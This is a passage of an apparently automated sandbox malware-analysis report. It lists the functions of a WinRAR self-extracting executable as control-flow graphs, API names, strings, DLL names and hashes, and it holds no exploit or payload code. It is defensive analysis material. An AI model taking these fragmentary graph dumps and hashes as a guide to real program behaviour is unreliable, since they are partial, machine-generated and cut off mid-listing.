7ff75fbafa98-7ff75fbafa9f call 7ff75fb9a5b0 240->282 247 7ff75fbafcc3-7ff75fbafcc6 241->247 248 7ff75fbafac9-7ff75fbafb98 GetModuleFileNameW call 7ff75fba0b1c call 7ff75fb945d8 CreateFileMappingW 241->248 242->196 256 7ff75fbb0149-7ff75fbb016f DialogBoxParamW 242->256 247->105 247->246 271 7ff75fbafc3e 248->271 272 7ff75fbafb9e-7ff75fbafbae GetCommandLineW 248->272 256->196 262 7ff75fbb0171 256->262 262->196 279 7ff75fbafc43-7ff75fbafc71 call 7ff75fc010f0 call 7ff75fba0d80 * 2 271->279 276 7ff75fbafbb0-7ff75fbafbc0 call 7ff75fba2090 272->276 277 7ff75fbafbc5-7ff75fbafc3c call 7ff75fbaf230 * 3 call 7ff75fba0d18 MapViewOfFile call 7ff75fbb4930 272->277 276->277 277->279 309 7ff75fbafc73-7ff75fbafc82 call 7ff75fc01158 279->309 310 7ff75fbafca9 279->310 281->282 294 7ff75fbafaa4 282->294 326 7ff75fbafe37-7ff75fbafe3e 292->326 327 7ff75fbafe5e-7ff75fbafe66 call 7ff75fb91374 292->327 293->292 294->227 322 7ff75fbafc85-7ff75fbafc88 309->322 316 7ff75fbafcac-7ff75fbafcaf 310->316 316->247 320 7ff75fbafcb1-7ff75fbafcbd UnmapViewOfFile CloseHandle 316->320 320->247 324 7ff75fbafc8a-7ff75fbafc9a Sleep 322->324 325 7ff75fbafc9c-7ff75fbafca7 322->325 324->322 324->325 325->316 326->327 329 7ff75fbafe40-7ff75fbafe47 326->329 331 7ff75fbafe6b-7ff75fbafe72 327->331 329->327 330 7ff75fbafe49-7ff75fbafe59 call 7ff75fbb08e0 329->330 330->327 331->120
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text$ButtonCheckedMessageswprintf$File$DialogErrorLastWindow$LoadLongStringView$CloseCommandCountCreateDispatchEnableFocusHandleLineMappingModuleNameParamSendSleepTickTranslateUnmapwcscpy
                                                                                                                                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$@$C:\Users\user\AppData\Local\Temp\7zS49DD90FA$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$p$runas$winrarsfxmappingfile.tmp
                                                                                                                                                                                                              • API String ID: 1377943202-88273296
                                                                                                                                                                                                              • Opcode ID: 959ec2e3c6c340ac9f8615344b3a6b339079ba82ea2973b9d65de183914b3949
                                                                                                                                                                                                              • Instruction ID: 34dc9724fade48506b263d75f7beb73a6a027fd25cfd669b48d0037215533ceb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 959ec2e3c6c340ac9f8615344b3a6b339079ba82ea2973b9d65de183914b3949
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A862AE64E0D6C3C6FB24BB31E9502FAA7A5AF45BC4FCC0139D94D076A6DE3CA5098361
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB08E0 Relevance: 53.3, APIs: 21, Strings: 9, Instructions: 833registryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Item$AttributesText$ButtonCheckedMoveswprintfwcscat$CloseCompareDeleteDialogEnvironmentExpandOpenPathQueryStringStringsTempValue
                                                                                                                                                                                                              • String ID: %s%s%u$%s.%d.tmp$.lnk$<br>$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                              • API String ID: 2559350931-2038501859
                                                                                                                                                                                                              • Opcode ID: f128066c9a7e88468d207f8392582c3a5e4d09d75c8970ceb165e7de9b4ce247
                                                                                                                                                                                                              • Instruction ID: 63a1909dde3bed571a7bd5fecb133b932379a0418ba7e0fcd7dcbfe881686210
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f128066c9a7e88468d207f8392582c3a5e4d09d75c8970ceb165e7de9b4ce247
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D825C62A186C3D9EB31BB31D8402FDA365FF40784FC84136D94D47A99EE6CEA45C364
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9FA1C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 245COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                                                                                                                                              • String ID: $%s:$CAPTION
                                                                                                                                                                                                              • API String ID: 1936833115-404845831
                                                                                                                                                                                                              • Opcode ID: 72e7e3ee6b17742e4cb2673df9a41092cb36fe08a2d3d22740af7c269679d036
                                                                                                                                                                                                              • Instruction ID: 00a3044e3a1c4356180e49b4488a0a4e20b4d767e0b9249c9a3166a89e09a9e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72e7e3ee6b17742e4cb2673df9a41092cb36fe08a2d3d22740af7c269679d036
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1891D972B1868287E714DF39E9406AAE7A1FB84784F885135EE4D47B98CF3CE805CB10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9B8F8 Relevance: 7.6, APIs: 5, Instructions: 93fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 869497890-0
                                                                                                                                                                                                              • Opcode ID: 03fc193e635db437b7016961caeff27e2e61dad9e90c9a20ddae6e7681612538
                                                                                                                                                                                                              • Instruction ID: d9aaa77ebb12bef8d5819c31c9030c4b265b5a37338482d8f13b4cce366c6dda
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03fc193e635db437b7016961caeff27e2e61dad9e90c9a20ddae6e7681612538
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C416072618AC1D6DA24AB35D5402E9A3A0FB48BE0F884332EBBD437C5CF7CD6558710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB936C8 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 514COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1208 7ff75fb936c8-7ff75fb93712 call 7ff75fbb3900 call 7ff75fb9de8c 1213 7ff75fb93718-7ff75fb9372a 1208->1213 1214 7ff75fb938be 1208->1214 1213->1214 1216 7ff75fb93730-7ff75fb93741 1213->1216 1215 7ff75fb938c1-7ff75fb938cb call 7ff75fb9e0d4 1214->1215 1220 7ff75fb938d0-7ff75fb938d4 1215->1220 1218 7ff75fb93743-7ff75fb93756 call 7ff75fb9144c 1216->1218 1219 7ff75fb9375b-7ff75fb93778 1216->1219 1226 7ff75fb93f99-7ff75fb93fc6 call 7ff75fb916d8 1218->1226 1224 7ff75fb938d6-7ff75fb938de call 7ff75fb944f0 1219->1224 1227 7ff75fb9377e-7ff75fb9378c 1219->1227 1223 7ff75fb938e3-7ff75fb9391c call 7ff75fb9df08 call 7ff75fb9e0ac call 7ff75fb9e064 1220->1223 1220->1224 1247 7ff75fb93f90-7ff75fb93f98 call 7ff75fb92360 1223->1247 1248 7ff75fb93922-7ff75fb93924 1223->1248 1224->1226 1231 7ff75fb9379a 1227->1231 1232 7ff75fb9378e-7ff75fb93798 call 7ff75fba38f8 1227->1232 1237 7ff75fb9379d-7ff75fb937dc call 7ff75fb94350 1231->1237 1232->1231 1232->1237 1244 7ff75fb93866-7ff75fb9388b call 7ff75fb96670 1237->1244 1253 7ff75fb937e1-7ff75fb937fc call 7ff75fbb5790 1244->1253 1254 7ff75fb93891-7ff75fb93895 1244->1254 1247->1226 1248->1247 1250 7ff75fb9392a-7ff75fb93936 1248->1250 1250->1247 1255 7ff75fb9393c-7ff75fb93940 1250->1255 1253->1254 1261 7ff75fb93802-7ff75fb9380b 1253->1261 1254->1215 1255->1247 1256 7ff75fb93946-7ff75fb9395a call 7ff75fb9e0d4 1255->1256 1256->1224 1262 7ff75fb93960-7ff75fb939b8 call 7ff75fb9e034 call 7ff75fb9e064 * 2 1256->1262 1263 7ff75fb93811-7ff75fb93861 call 7ff75fb92230 call 7ff75fba0a84 call 7ff75fb94350 1261->1263 1264 7ff75fb93897-7ff75fb938b9 call 7ff75fb92230 call 7ff75fb97888 1261->1264 1281 7ff75fb939f2-7ff75fb939fc 1262->1281 1282 7ff75fb939ba-7ff75fb939dc call 7ff75fb92360 call 7ff75fb97888 1262->1282 1263->1244 1264->1226 1283 7ff75fb93a1a-7ff75fb93a24 1281->1283 1284 7ff75fb939fe-7ff75fb93a14 call 7ff75fb9e064 1281->1284 1282->1281 1299 7ff75fb939de-7ff75fb939ed call 7ff75fb92230 1282->1299 1287 7ff75fb93a33-7ff75fb93a4b call 7ff75fb91aec 1283->1287 1288 7ff75fb93a26-7ff75fb93a30 call 7ff75fb9e064 1283->1288 1284->1247 1284->1283 1297 7ff75fb93a68 1287->1297 1298 7ff75fb93a4d-7ff75fb93a50 1287->1298 1288->1287 1301 7ff75fb93a6b-7ff75fb93a7d 1297->1301 1298->1297 1302 7ff75fb93a52-7ff75fb93a66 1298->1302 1299->1281 1304 7ff75fb93ed2-7ff75fb93f45 call 7ff75fb9c0e4 call 7ff75fb9e064 1301->1304 1305 7ff75fb93a83-7ff75fb93a86 1301->1305 1302->1297 1302->1301 1321 7ff75fb93f53 1304->1321 1322 7ff75fb93f47-7ff75fb93f51 call 7ff75fb9e064 1304->1322 1306 7ff75fb93c0f-7ff75fb93c8e call 7ff75fb9c03c call 7ff75fb9e064 * 2 1305->1306 1307 7ff75fb93a8c-7ff75fb93a8f 1305->1307 1338 7ff75fb93c90-7ff75fb93c9a 1306->1338 1339 7ff75fb93ca1-7ff75fb93cd3 call 7ff75fb9e064 1306->1339 1307->1306 1310 7ff75fb93a95-7ff75fb93a98 1307->1310 1313 7ff75fb93ae3-7ff75fb93b09 call 7ff75fb9e064 1310->1313 1314 7ff75fb93a9a-7ff75fb93a9d 1310->1314 1329 7ff75fb93b38-7ff75fb93b64 call 7ff75fb9e064 call 7ff75fb9deb4 1313->1329 1330 7ff75fb93b0b-7ff75fb93b0e 1313->1330 1317 7ff75fb93aa3-7ff75fb93ade call 7ff75fb9e064 1314->1317 1318 7ff75fb93f8a-7ff75fb93f8e 1314->1318 1317->1318 1318->1226 1327 7ff75fb93f55-7ff75fb93f62 1321->1327 1322->1327 1334 7ff75fb93f64-7ff75fb93f66 1327->1334 1335 7ff75fb93f68 1327->1335 1354 7ff75fb93b6f-7ff75fb93b8d call 7ff75fb9df80 1329->1354 1355 7ff75fb93b66-7ff75fb93b6d 1329->1355 1336 7ff75fb93b15-7ff75fb93b33 call 7ff75fb945d8 call 7ff75fb94538 1330->1336 1334->1335 1341 7ff75fb93f6b-7ff75fb93f75 1334->1341 1335->1341 1336->1226 1338->1339 1352 7ff75fb93cd5-7ff75fb93ce8 call 7ff75fb9df08 call 7ff75fba32fc 1339->1352 1353 7ff75fb93ced-7ff75fb93cfc 1339->1353 1341->1318 1345 7ff75fb93f77-7ff75fb93f85 call 7ff75fb924a8 1341->1345 1345->1318 1352->1353 1357 7ff75fb93d1a-7ff75fb93d49 call 7ff75fb9e064 1353->1357 1358 7ff75fb93cfe-7ff75fb93d13 call 7ff75fb9df08 1353->1358 1366 7ff75fb93b8f-7ff75fb93bfd call 7ff75fb9df80 * 2 call 7ff75fba19e8 call 7ff75fba1a28 call 7ff75fba1894 call 7ff75fbb5790 1354->1366 1367 7ff75fb93c03-7ff75fb93c0a 1354->1367 1355->1336 1370 7ff75fb93d53-7ff75fb93d90 call 7ff75fb9e064 * 2 1357->1370 1371 7ff75fb93d4b 1357->1371 1358->1357 1366->1367 1367->1318 1381 7ff75fb93d92-7ff75fb93d99 1370->1381 1382 7ff75fb93d9b-7ff75fb93d9f 1370->1382 1371->1370 1384 7ff75fb93da8-7ff75fb93ddb 1381->1384 1382->1384 1385 7ff75fb93da1 1382->1385 1387 7ff75fb93de5 1384->1387 1388 7ff75fb93ddd-7ff75fb93de3 1384->1388 1385->1384 1390 7ff75fb93de8-7ff75fb93e6d call 7ff75fb9df80 call 7ff75fba3a04 1387->1390 1388->1387 1388->1390 1398 7ff75fb93e6f-7ff75fb93e7d call 7ff75fb924a8 1390->1398 1399 7ff75fb93e82-7ff75fb93e86 1390->1399 1398->1399 1401 7ff75fb93e95-7ff75fb93ea6 call 7ff75fbb82fc 1399->1401 1402 7ff75fb93e88-7ff75fb93e93 call 7ff75fb923b4 1399->1402 1407 7ff75fb93eaf-7ff75fb93eb6 1401->1407 1408 7ff75fb93ea8 1401->1408 1402->1407 1407->1318 1409 7ff75fb93ebc-7ff75fb93ecd call 7ff75fb92230 1407->1409 1408->1407 1409->1318
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: CMT$h%u$hc%u
                                                                                                                                                                                                              • API String ID: 0-3282847064
                                                                                                                                                                                                              • Opcode ID: 980b5d6b2f8bde9131efd3dc6bf85e029cd2c5184a27bdaf7718a0e781562d44
                                                                                                                                                                                                              • Instruction ID: 47f72a16a76211b7a00a2a9b5bbf51c6c9816f704979a22ee73988ecb30b17bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 980b5d6b2f8bde9131efd3dc6bf85e029cd2c5184a27bdaf7718a0e781562d44
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA32E362B0C6C2E6EB08EB70D6552FDA7A5FB40B44F8C0236DB4D43686DF68E564C721
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA2378 Relevance: 154.4, APIs: 22, Strings: 66, Instructions: 354libraryfileloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 7ff75fba2378-7ff75fba23bb call 7ff75fbb3900 GetModuleHandleW 3 7ff75fba2412-7ff75fba2707 0->3 4 7ff75fba23bd-7ff75fba23d0 GetProcAddress 0->4 7 7ff75fba27f8-7ff75fba2830 GetModuleFileNameW call 7ff75fb9d4e0 call 7ff75fba2090 3->7 8 7ff75fba270d-7ff75fba2716 call 7ff75fbbc0b0 3->8 5 7ff75fba23d2-7ff75fba23e1 4->5 6 7ff75fba23ea-7ff75fba23fd GetProcAddress 4->6 5->6 6->3 9 7ff75fba23ff-7ff75fba240f 6->9 20 7ff75fba2833-7ff75fba283d call 7ff75fb9c108 7->20 8->7 14 7ff75fba271c-7ff75fba2760 GetModuleFileNameW CreateFileW 8->14 9->3 18 7ff75fba27ef-7ff75fba27f2 CloseHandle 14->18 19 7ff75fba2766-7ff75fba2779 SetFilePointer 14->19 18->7 19->18 21 7ff75fba277b-7ff75fba279f ReadFile 19->21 26 7ff75fba283f-7ff75fba284a call 7ff75fba2320 20->26 27 7ff75fba2872-7ff75fba289a call 7ff75fb9d56c GetFileAttributesW 20->27 21->18 23 7ff75fba27a1-7ff75fba27b7 21->23 25 7ff75fba27c0-7ff75fba27d5 call 7ff75fba1da8 23->25 33 7ff75fba27e8 25->33 34 7ff75fba27d7-7ff75fba27e6 call 7ff75fba2320 25->34 26->27 36 7ff75fba284c-7ff75fba2870 CompareStringW 26->36 38 7ff75fba28b0 27->38 39 7ff75fba289c 27->39 33->18 34->25 36->27 40 7ff75fba28a3-7ff75fba28ac 36->40 42 7ff75fba28b3-7ff75fba28b6 38->42 39->40 40->20 45 7ff75fba28ae 40->45 43 7ff75fba28b8-7ff75fba28bb 42->43 44 7ff75fba28f9-7ff75fba28fc 42->44 46 7ff75fba28bf-7ff75fba28e7 call 7ff75fb9d56c GetFileAttributesW 43->46 47 7ff75fba2a2f-7ff75fba2a4a 44->47 48 7ff75fba2902-7ff75fba2918 call 7ff75fb9d534 call 7ff75fb9c108 44->48 45->42 53 7ff75fba28f6 46->53 54 7ff75fba28e9-7ff75fba28f2 46->54 58 7ff75fba2991-7ff75fba29cc call 7ff75fb945d8 AllocConsole 48->58 59 7ff75fba291a-7ff75fba298c call 7ff75fba2320 * 2 call 7ff75fb9fdf8 call 7ff75fb945d8 call 7ff75fb9fdf8 call 7ff75fbae4b4 48->59 53->44 54->46 56 7ff75fba28f4 54->56 56->44 65 7ff75fba2a26-7ff75fba2a28 ExitProcess 58->65 66 7ff75fba29ce-7ff75fba2a20 GetCurrentProcessId AttachConsole call 7ff75fbb82c8 GetStdHandle WriteConsoleW Sleep FreeConsole 58->66 59->65 66->65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcessswprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreePointerReadSleepStringSystemVersionWrite
                                                                                                                                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                                                                                              • API String ID: 1134909389-2013832382
                                                                                                                                                                                                              • Opcode ID: 9ec152225e947b8a38975a7bd9ef8128333a6983848ce7b3085898e50c8c5309
                                                                                                                                                                                                              • Instruction ID: 6f594a326766341ee2181dc696a9e702a8f0531546ec559730f85409c1b02593
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ec152225e947b8a38975a7bd9ef8128333a6983848ce7b3085898e50c8c5309
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D112BB35A09B82D9EB21AF30E8401EAB7A5FF44754F980236DA9D46764EF3CD658C360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB2614 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 204filesleeptimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 689 7ff75fbb2614-7ff75fbb2675 call 7ff75fba2378 call 7ff75fbae27c call 7ff75fbae930 call 7ff75fbb4600 GetCommandLineW 698 7ff75fbb2778-7ff75fbb28d1 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime call 7ff75fb945d8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff75fbaf5c8 call 7ff75fb9efc8 call 7ff75fbac9e0 * 2 DialogBoxParamW call 7ff75fbacab8 * 2 689->698 699 7ff75fbb267b-7ff75fbb268a call 7ff75fbb0754 689->699 729 7ff75fbb28d3 Sleep 698->729 730 7ff75fbb28d9-7ff75fbb28e0 698->730 705 7ff75fbb2770-7ff75fbb2773 call 7ff75fbb2124 699->705 706 7ff75fbb2690-7ff75fbb26ac OpenFileMappingW 699->706 705->698 708 7ff75fbb26b2-7ff75fbb26ce MapViewOfFile 706->708 709 7ff75fbb2765-7ff75fbb276e CloseHandle 706->709 712 7ff75fbb26d4-7ff75fbb2708 call 7ff75fbb4930 call 7ff75fbb2124 708->712 713 7ff75fbb275c-7ff75fbb275f UnmapViewOfFile 708->713 709->698 723 7ff75fbb270c-7ff75fbb2754 712->723 713->709 723->723 725 7ff75fbb2756-7ff75fbb2759 723->725 725->713 729->730 731 7ff75fbb28e2 call 7ff75fbaeb4c 730->731 732 7ff75fbb28e7-7ff75fbb28fb call 7ff75fba0a84 730->732 731->732 736 7ff75fbb2909-7ff75fbb2920 DeleteObject 732->736 737 7ff75fbb28fd-7ff75fbb2904 call 7ff75fbb38dc 732->737 739 7ff75fbb2922 DeleteObject 736->739 740 7ff75fbb2928-7ff75fbb292f 736->740 737->736 739->740 741 7ff75fbb2931-7ff75fbb2938 740->741 742 7ff75fbb294b-7ff75fbb295c 740->742 741->742 743 7ff75fbb293a-7ff75fbb2946 call 7ff75fb97888 741->743 744 7ff75fbb2970-7ff75fbb297d 742->744 745 7ff75fbb295e-7ff75fbb296a call 7ff75fbb2190 CloseHandle 742->745 743->742 748 